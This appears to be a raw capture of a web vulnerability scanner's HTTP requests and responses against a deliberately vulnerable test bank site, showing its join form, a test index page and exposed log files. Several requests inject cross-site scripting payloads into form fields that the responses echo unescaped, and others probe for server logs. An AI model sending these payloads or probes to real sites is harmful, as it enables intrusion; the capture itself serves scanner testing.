Phone:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="homephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Mobile Phone:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="mobilephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <tr><td align="center" bgcolor=#003388 colspan='2'>&nbsp;</td></tr> <tr><td align="center" bgcolor=#003388 colspan='2'><b><a href="javascript:document.forms[0].submit()">Join</a></b></td></tr> <tr><td align="center" bgcolor=#003388 colspan='2'>&nbsp;</td></tr> <tr><td align="center" bgcolor=#c000ff colspan='2'>&nbsp;</td></tr> </center> </Table> </table> </body> </html>
GET /pindex.asp HTTP/1.0 Referer: http://zero.webappsecurity.com:80/banklogin.asp?serviceName=FreebankCaastAccess&templateName=prod_sel.forte&source=Freebank&AD_REFERRING_URL=http://www.Freebank.com Connection: Close Host: zero.webappsecurity.com User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0) Pragma: no-cache Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; CustomCookie=WebInspect
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Thu, 04 Dec 2003 16:24:17 GMT X-Powered-By: ASP.NET Connection: Keep-Alive Content-Length: 1771 Content-Type: text/html Cache-control: private <HTML> <HEAD> <TITLE></TITLE> </HEAD> <BODY> <!-- Hidden Reference comment: should find this file /test/hidden.txt --> <P> The first section shows how a combo box can be used to product optional pages<BR></P> <FORM ACTION="pcomboindex.asp" METHOD="post"> <SELECT NAME="cboPage"> <OPTION SELECTED="SELECTED" VALUE="pc1">Show Page One</OPTION> <OPTION VALUE="pc2">Show Page Two</OPTION> <OPTION VALUE="pc3">Show page three</OPTION> </SELECT><BR> <INPUT TYPE="submit" VALUE="Submit"> </FORM><BR> <HR> <P><A HREF="plink.asp?a=b&c=12">Second section is link that passes parameters to a sub page</A><BR> <BR> <A HREF="error.html">My ERROR</A> Third example allows the user to input values and then shows them on the following page</P> <BR> <HR> <P>False Keyword that should not be flagged: root:x:0:0:/root:/bin/sh <BR> False Keyword that should not be flagged: An error has occurred <BR> <BR> <BR> <A HREF="adcenter.cgi">Link to adcenter.cgi exploit - Should be flagged by SmartChecker</A> <BR> <A HREF="/user/adcenter.cgi">Link to adcenter.cgi exploit - Should not be flagged due to not having keyword present</A> <BR> <A HREF="/test/adcenter.cgi">Link to adcenter.cgi exploit - Should be flagged by Smartchecker(Note: No HTML present)</A> <BR> <A HREF="/linking/index.htm">Several chained directories</A> <BR> <A HREF="/cfmerror.html">Cold Fusion Error</A> <BR> <A HREF="/admin/help.cgi">Help</A> <BR> <A HREF="/aspnet.aspx">ASP.NET file</A> </P> <A HREF="sldjfsld;jsdl;kjfsdl;fj">Invalid link</A> <a href="/cookietest/">A cookie test page</a><br> <A HREF="http://www.spidynamics.com:34/login.asp">Timeout Link</A> <A HREF="/auth/">Protected Page</A> </BODY> </HTML>
GET /join.asp?name=>"'><img%20src="javascript:alert('XSS')">&email=&surname=&house=&street=&address2=&town=&postcode=&country=&homephone=&mobilephone=&msg=Please%2Bfill%2Bin%2Byour%2Bname HTTP/1.0 Referer: http://zero.webappsecurity.com:80/join1.asp Connection: Close Host: zero.webappsecurity.com User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0) Pragma: no-cache Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Thu, 04 Dec 2003 16:55:35 GMT X-Powered-By: ASP.NET Connection: Keep-Alive Content-Length: 4013 Content-Type: text/html Cache-control: private Set-Cookie: passes3=; path=/ Set-Cookie: passes2=; path=/ Set-Cookie: passes=; path=/ <html> <html> <head> <title>Join Us</title> <STYLE> <!-- td {font-size: 9pt; color: #FEFCE0; font-family: verdana, arial} A:link {text-decoration: none; color: #FFFFFF;} A:visited {text-decoration: none; color: #FEFCE0;} A:active {text-decoration: none; color: #FFFFFF;} A:hover {text-decoration: none; color:#CCFFFF;} --> </STYLE> </HEAD> <body bgcolor="#000066" bgproperties=fixed topmargin="0" leftmargin="0" marginheight="0" marginwidth="0"> <td valign="top" align="center"> <table width="100%" border="0" cellpadding="5" cellspacing="0" align="center"> <tr><td height="32" bgcolor="#c000ff"><center><b>J&nbsp;O&nbsp;I&nbsp;N</b></center></td></tr> <tr><td> <table cellpadding="0" cellspacing="2" border="0" width="400" align="center"> <tr><td>&nbsp;</td></tr> <tr><td>&nbsp;</td></tr> <FORM ACTION="join1.asp" METHOD="get" NAME="TheForm"> <center> <tr><td bgcolor=#c000ff colspan='2'><b><center>Please+fill+in+your+name</center></b></td></tr> <tr><td align="center" bgcolor=#003388 colspan='2'>&nbsp;</td></tr> <TR><TD align="right" bgcolor=#003388><B>Name:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Name" TYPE="text" VALUE=">"'><img src="javascript:alert('XSS')">"></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Surname:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Surname" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>E-mail Address:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="email" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Password:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Confirm Password:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Confirm Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>House Number:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="house" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Street:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="street" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Address Line 2:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Address2" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Town/City:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="town" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Postcode:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Postcode" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Country:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Country" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Home Phone:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="homephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Mobile Phone:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="mobilephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <tr><td align="center" bgcolor=#003388 colspan='2'>&nbsp;</td></tr> <tr><td align="center" bgcolor=#003388 colspan='2'><b><a href="javascript:document.forms[0].submit()">Join</a></b></td></tr> <tr><td align="center" bgcolor=#003388 colspan='2'>&nbsp;</td></tr> <tr><td align="center" bgcolor=#c000ff colspan='2'>&nbsp;</td></tr> </center> </Table> </table> </body> </html>
GET /join.asp?name=&email=&surname=&house=&street=&address2=&town=&postcode=>"><script>alert('XSS')</script>&country=&homephone=&mobilephone=&msg=Please%2Bfill%2Bin%2Byour%2Bname HTTP/1.0 Referer: http://zero.webappsecurity.com:80/join1.asp Connection: Close Host: zero.webappsecurity.com User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0) Pragma: no-cache Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Thu, 04 Dec 2003 16:55:28 GMT X-Powered-By: ASP.NET Connection: Keep-Alive Content-Length: 4006 Content-Type: text/html Cache-control: private Set-Cookie: passes3=; path=/ Set-Cookie: passes2=; path=/ Set-Cookie: passes=; path=/ <html> <html> <head> <title>Join Us</title> <STYLE> <!-- td {font-size: 9pt; color: #FEFCE0; font-family: verdana, arial} A:link {text-decoration: none; color: #FFFFFF;} A:visited {text-decoration: none; color: #FEFCE0;} A:active {text-decoration: none; color: #FFFFFF;} A:hover {text-decoration: none; color:#CCFFFF;} --> </STYLE> </HEAD> <body bgcolor="#000066" bgproperties=fixed topmargin="0" leftmargin="0" marginheight="0" marginwidth="0"> <td valign="top" align="center"> <table width="100%" border="0" cellpadding="5" cellspacing="0" align="center"> <tr><td height="32" bgcolor="#c000ff"><center><b>J&nbsp;O&nbsp;I&nbsp;N</b></center></td></tr> <tr><td> <table cellpadding="0" cellspacing="2" border="0" width="400" align="center"> <tr><td>&nbsp;</td></tr> <tr><td>&nbsp;</td></tr> <FORM ACTION="join1.asp" METHOD="get" NAME="TheForm"> <center> <tr><td bgcolor=#c000ff colspan='2'><b><center>Please+fill+in+your+name</center></b></td></tr> <tr><td align="center" bgcolor=#003388 colspan='2'>&nbsp;</td></tr> <TR><TD align="right" bgcolor=#003388><B>Name:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Name" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Surname:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Surname" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>E-mail Address:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="email" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Password:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Confirm Password:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Confirm Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>House Number:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="house" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Street:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="street" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Address Line 2:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Address2" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Town/City:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="town" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Postcode:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Postcode" TYPE="text" VALUE=">"><script>alert('XSS')</script>"></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Country:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Country" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Home Phone:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="homephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Mobile Phone:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="mobilephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <tr><td align="center" bgcolor=#003388 colspan='2'>&nbsp;</td></tr> <tr><td align="center" bgcolor=#003388 colspan='2'><b><a href="javascript:document.forms[0].submit()">Join</a></b></td></tr> <tr><td align="center" bgcolor=#003388 colspan='2'>&nbsp;</td></tr> <tr><td align="center" bgcolor=#c000ff colspan='2'>&nbsp;</td></tr> </center> </Table> </table> </body> </html>
GET /W3SVC1/ex001102.log HTTP/1.0 Connection: Close Host: zero.webappsecurity.com User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0) Pragma: no-cache Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 X-Powered-By: ASP.NET Date: Thu, 04 Dec 2003 16:42:55 GMT Content-Type: application/octet-stream Accept-Ranges: bytes Last-Modified: Mon, 16 Jul 2001 03:47:18 GMT ETag: "d828b92aadc11:8f6" Content-Length: 19 LOGIC CHECK SUCCESS
GET /W3SVC6/ HTTP/1.0 Connection: Close Host: zero.webappsecurity.com User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0) Pragma: no-cache Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 403 Access Forbidden Server: Microsoft-IIS/5.0 Date: Thu, 04 Dec 2003 16:26:12 GMT Content-Type: text/html Content-Length: 172 <html><head><title>Directory Listing Denied</title></head> <body><h1>Directory Listing Denied</h1>This Virtual Directory does not allow contents to be listed.</body></html>
GET /errors/errors.log HTTP/1.0 Connection: Close Host: zero.webappsecurity.com User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0) Pragma: no-cache Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 X-Powered-By: ASP.NET Date: Thu, 04 Dec 2003 16:42:24 GMT Content-Type: application/octet-stream Accept-Ranges: bytes Last-Modified: Mon, 16 Jul 2001 03:47:16 GMT ETag: "1ebfab1aadc11:8f6" Content-Length: 8277 <TITLE>LSWEB General Access Error Log</TITLE>Today is: 02-21-2001.<br>You are connecting from 65.80.48.114<br>Using Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)<p>You can use the following to debug your CGI scripts<BR>Reload to update<HR><PRE>[Wed Feb 21 11:10:53 2001] [notice] child pid 20073 exit signal Segmentation Fault (11), possible coredump in /usr/local/web/apache-1.3.9 [Wed Feb 21 11:10:58 2001] [error] [client 192.107.108.150] Premature end of script headers: /www/htdocs/depts/anth/discus/scripts/show.cgi [Wed Feb 21 11:10:58 2001] [error] [client 192.107.108.150] Premature end of script headers: /www/htdocs/depts/anth/discus/scripts/show.cgi [Wed Feb 21 11:11:39 2001] [error] [client 62.104.210.91] File does not exist: /www/htdocs/depts/soc/robots.txt [Wed Feb 21 11:11:56 2001] [error] [client 38.194.33.193] File does not exist: /www/htdocs/depts/anth/projects/elpilar/transparent.gif [Wed Feb 21 11:12:03 2001] [notice] child pid 20084 exit signal Segmentation Fault (11), possible coredump in /usr/local/web/apache-1.3.9 [Wed Feb 21 11:12:05 2001] [info] [client 209.244.133.207] (32)Broken pipe: client stopped connection before send mmap completed [Wed Feb 21 11:12:08 2001] [info] server seems busy, (you may need to increase StartServers, or Min/MaxSpareServers), spawning 8 children, there are 7 idle, and 33 total children [Wed Feb 21 11:12:09 2001] [notice] child pid 20094 exit signal Segmentation Fault (11), possible coredump in /usr/local/web/apache-1.3.9 [Wed Feb 21 11:12:10 2001] [notice] child pid 20096 exit signal Segmentation Fault (11), possible coredump in /usr/local/web/apache-1.3.9 [Wed Feb 21 11:12:24 2001] [error] [client 38.194.33.193] File does not exist: /www/htdocs/depts/anth/projects/elpilar/transparent.gif [Wed Feb 21 11:12:28 2001] [error] [client 38.194.33.193] File does not exist: /www/htdocs/lsweb/projects/pilarweb/transparent.gif [Wed Feb 21 11:12:47 2001] [info] [client 165.91.173.150] (32)Broken pipe: client stopped connection before send mmap completed [Wed Feb 21 11:13:04 2001] [error] [client 207.107.50.207] File does not exist: /www/htdocs/depts/anth/robots.txt [Wed Feb 21 11:13:11 2001] [info] server seems busy, (you may need to increase StartServers, or Min/MaxSpareServers), spawning 8 children, there are 5 idle, and 33 total children [Wed Feb 21 11:13:13 2001] [error] [client 208.219.77.29] File does not exist: /www/htdocs/depts/ger/robots.txt [Wed Feb 21 11:13:13 2001] [notice] child pid 20115 exit signal Segmentation Fault (11), possible coredump in /usr/local/web/apache-1.3.9 [Wed Feb 21 11:13:18 2001] [info] [client 204.19.14.93] (32)Broken pipe: client stopped connection before send mmap completed [Wed Feb 21 11:14:17 2001] [info] [client 209.146.77.133] (32)Broken pipe: client stopped connection before send mmap completed [Wed Feb 21 11:14:26 2001] [error] [client 38.194.33.193] File does not exist: /www/htdocs/lsweb/projects/pilarweb/transparent.gif [Wed Feb 21 11:14:36 2001] [error] [client 38.194.33.193] File does not exist: /www/htdocs/lsweb/projects/pilarweb/transparent.gif [Wed Feb 21 11:14:48 2001] [info] [client 128.111.225.51] (32)Broken pipe: client stopped connection before send mmap completed [Wed Feb 21 11:16:15 2001] [error] [client 195.93.66.164] Premature end of script headers: /www/htdocs/depts/ger/projects/hesse/cgi-bin/Count.cgi [Wed Feb 21 11:16:26 2001] [error] [client 207.55.56.14] File does not exist: /www/htdocs/depts/artst/terminals/acker/acker.html [Wed Feb 21 11:16:28 2001] [error] [client 38.194.33.193] File does not exist: /www/htdocs/lsweb/projects/pilarweb/transparent.gif [Wed Feb 21 11:16:28 2001] [info] [client 216.125.117.6] send mmap timed out [Wed Feb 21 11:16:33 2001] [error] [client 38.194.33.193] File does not exist: /www/htdocs/lsweb/projects/pilarweb/transparent.gif [Wed Feb 21 11:16:34 2001] [error] [client 63.211.243.14] File does not exist: /www/htdocs/lsweb/projects/pilarweb/transparent.gif [Wed Feb 21 11:16:36 2001] [info] [client 129.252.222.2] (32)Broken pipe: client stopped connection before send mmap completed [Wed Feb 21 11:16:37 2001] [error] [client 128.111.96.187] File does not exist: /www/htdocs/depts/soc/projects/ct3/spacer1.gif [Wed Feb 21 11:16:48 2001] [error] [client 63.227.243.33] Premature end of script headers: /www/htdocs/depts/anth/discus/scripts/show.cgi [Wed Feb 21 11:16:49 2001] [notice] child pid 20154 exit signal Segmentation Fault (11), possible coredump in /usr/local/web/apache-1.3.9 [Wed Feb 21 11:16:58 2001] [info] [client 128.111.96.187] (32)Broken pipe: client stopped connection before send mmap completed [Wed Feb 21 11:17:14 2001] [info] [client 128.111.165.82] (32)Broken pipe: client stopped connection before send mmap completed [Wed Feb 21 11:17:36 2001] [info] [client 130.160.7.76] (32)Broken pipe: client stopped connection before send mmap completed [Wed Feb 21 11:17:41 2001] [error] [client 63.227.243.33] Premature end of script headers: /www/htdocs/depts/anth/discus/scripts/show.cgi [Wed Feb 21 11:17:43 2001] [notice] child pid 20158 exit signal Segmentation Fault (11), possible coredump in /usr/local/web/apache-1.3.9 [Wed Feb 21 11:18:11 2001] [error] [client 160.39.194.62] Premature end of script headers: /www/htdocs/depts/ger/projects/hesse/cgi-bin/Count.cgi [Wed Feb 21 11:18:18 2001] [error] [client 160.39.194.62] Premature end of script headers: /usr/local/web/wwwthreads//postlist.pl [Wed Feb 21 11:18:33 2001] [info] [client 128.111.96.187] (32)Broken pipe: client stopped connection before send mmap completed [Wed Feb 21 11:18:42 2001] [error] [client 165.138.105.253] File does not exist: /www/htdocs/depts/ger/projects/hesse/hesse.html [Wed Feb 21 11:19:04 2001] [error] [client 209.202.148.35] File does not exist: /www/htdocs/depts/writ/robots.txt [Wed Feb 21 11:19:08 2001] [error] [client 216.35.103.75] File does not exist: /www/htdocs/depts/artst/~tvc/v09/interviews/v09int.ser_ulm.html [Wed Feb 21 11:19:24 2001] [notice] child pid 20278 exit signal Segmentation Fault (11), possible coredump in /usr/local/web/apache-1.3.9 [Wed Feb 21 11:19:27 2001] [notice] child pid 20282 exit signal Segmentation Fault (11), possible coredump in /usr/local/web/apache-1.3.9 [Wed Feb 21 11:19:28 2001] [info] [client 195.205.28.2] (32)Broken pipe: client stopped connection before send mmap completed [Wed Feb 21 11:19:34 2001] [notice] child pid 20284 exit signal Segmentation Fault (11), possible coredump in /usr/local/web/apache-1.3.9 [Wed Feb 21 11:21:24 2001] [error] [client 207.55.56.14] File does not exist: /www/htdocs/depts/artst/terminals/t1/wwwboard/faq.html [Wed Feb 21 11:21:25 2001] [notice] child pid 20397 exit signal Segmentation Fault (11), possible coredump in /usr/local/web/apache-1.3.9 [Wed Feb 21 11:21:26 2001] [notice] child pid 20399 exit signal Segmentation Fault (11), possible coredump in /usr/local/web/apache-1.3.9 [Wed Feb 21 11:21:27 2001] [notice] child pid 20400 exit signal Segmentation Fault (11), possible coredump in /usr/local/web/apache-1.3.9 [Wed Feb 21 11:21:28 2001] [info] [client 151.188.89.64] (32)Broken pipe: client stopped connection before send body completed [Wed Feb 21 11:22:11 2001] [error] [client 206.110.15.140] File does not exist: /www/htdocs/lsweb/projects/pilarweb/transparent.gif [Wed Feb 21 11:22:11 2001] [error] [client 206.110.15.140] File does not exist: /www/htdocs/lsweb/projects/pilarweb/transparent.gif [Wed Feb 21 11:23:28 2001] [notice] child pid 20422 exit signal Segmentation Fault (11), possible coredump in /usr/local/web/apache-1.3.9 [Wed Feb 21 11:23:37 2001] [error] [client 65.5.146.93] File does not exist: /www/htdocs/depts/writ/faculty/johnston/courses/writ2/w01 [Wed Feb 21 11:23:54 2001] [error] [client 200.15.34.155] File does not exist: /www/htdocs/lsweb/projects/pilarweb/transparent.gif [Wed Feb 21 11:24:53 2001] [error] [client 128.111.36.88] File does not exist: /www/htdocs/depts/anth/classes/wo1/anth2 [Wed Feb 21 11:25:02 2001] [error] [client 128.111.36.88] File does not exist: /www/htdocs/depts/anth/classes/wo1/anth2 [Wed Feb 21 11:25:09 2001] [error] [client 216.208.71.130] File does not exist: /www/htdocs/depts/ger/projects/hesse/hesse.html </PRE>
GET /join.asp?name=&email=&surname=&house=&street=&address2=&town=>"'><img%20src="javascript:alert('XSS')">&postcode=&country=&homephone=&mobilephone=&msg=Please%2Bfill%2Bin%2Byour%2Bname HTTP/1.0 Referer: http://zero.webappsecurity.com:80/join1.asp Connection: Close Host: zero.webappsecurity.com User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0) Pragma: no-cache Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Thu, 04 Dec 2003 16:55:39 GMT X-Powered-By: ASP.NET Connection: Keep-Alive Content-Length: 4013 Content-Type: text/html Cache-control: private Set-Cookie: passes3=; path=/ Set-Cookie: passes2=; path=/ Set-Cookie: passes=; path=/ <html> <html> <head> <title>Join Us</title> <STYLE> <!-- td {font-size: 9pt; color: #FEFCE0; font-family: verdana, arial} A:link {text-decoration: none; color: #FFFFFF;} A:visited {text-decoration: none; color: #FEFCE0;} A:active {text-decoration: none; color: #FFFFFF;} A:hover {text-decoration: none; color:#CCFFFF;} --> </STYLE> </HEAD> <body bgcolor="#000066" bgproperties=fixed topmargin="0" leftmargin="0" marginheight="0" marginwidth="0"> <td valign="top" align="center"> <table width="100%" border="0" cellpadding="5" cellspacing="0" align="center"> <tr><td height="32" bgcolor="#c000ff"><center><b>J&nbsp;O&nbsp;I&nbsp;N</b></center></td></tr> <tr><td> <table cellpadding="0" cellspacing="2" border="0" width="400" align="center"> <tr><td>&nbsp;</td></tr> <tr><td>&nbsp;</td></tr> <FORM ACTION="join1.asp" METHOD="get" NAME="TheForm"> <center> <tr><td bgcolor=#c000ff colspan='2'><b><center>Please+fill+in+your+name</center></b></td></tr> <tr><td align="center" bgcolor=#003388 colspan='2'>&nbsp;</td></tr> <TR><TD align="right" bgcolor=#003388><B>Name:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Name" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Surname:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Surname" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>E-mail Address:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="email" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Password:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Confirm Password:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Confirm Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>House Number:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="house" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Street:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="street" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Address Line 2:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Address2" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Town/City:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="town" TYPE="text" VALUE=">"'><img src="javascript:alert('XSS')">"></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Postcode:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Postcode" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Country:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Country" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Home Phone:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="homephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Mobile Phone:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="mobilephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <tr><td align="center" bgcolor=#003388 colspan='2'>&nbsp;</td></tr> <tr><td align="center" bgcolor=#003388 colspan='2'><b><a href="javascript:document.forms[0].submit()">Join</a></b></td></tr> <tr><td align="center" bgcolor=#003388 colspan='2'>&nbsp;</td></tr> <tr><td align="center" bgcolor=#c000ff colspan='2'>&nbsp;</td></tr> </center> </Table> </table> </body> </html>
POST /pcomboindex.asp HTTP/1.0 Referer: http://zero.webappsecurity.com:80/pindex.asp Content-Length: 11 Content-Type: application/x-www-form-urlencoded Connection: Close Host: zero.webappsecurity.com User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0) Pragma: no-cache Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; CustomCookie=WebInspect cboPage=pc3
HTTP/1.1 302 Object moved Server: Microsoft-IIS/5.0 Date: Thu, 04 Dec 2003 16:24:21 GMT X-Powered-By: ASP.NET Location: p3.asp Connection: Keep-Alive Content-Length: 121 Content-Type: text/html Cache-control: private <head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="">here</a>.</body>
GET /join.asp?name=&email=&surname=&house=&street=&address2=>"'><img%20src="javascript:alert('XSS')">&town=&postcode=&country=&homephone=&mobilephone=&msg=Please%2Bfill%2Bin%2Byour%2Bname HTTP/1.0 Referer: http://zero.webappsecurity.com:80/join1.asp Connection: Close Host: zero.webappsecurity.com User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0) Pragma: no-cache Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
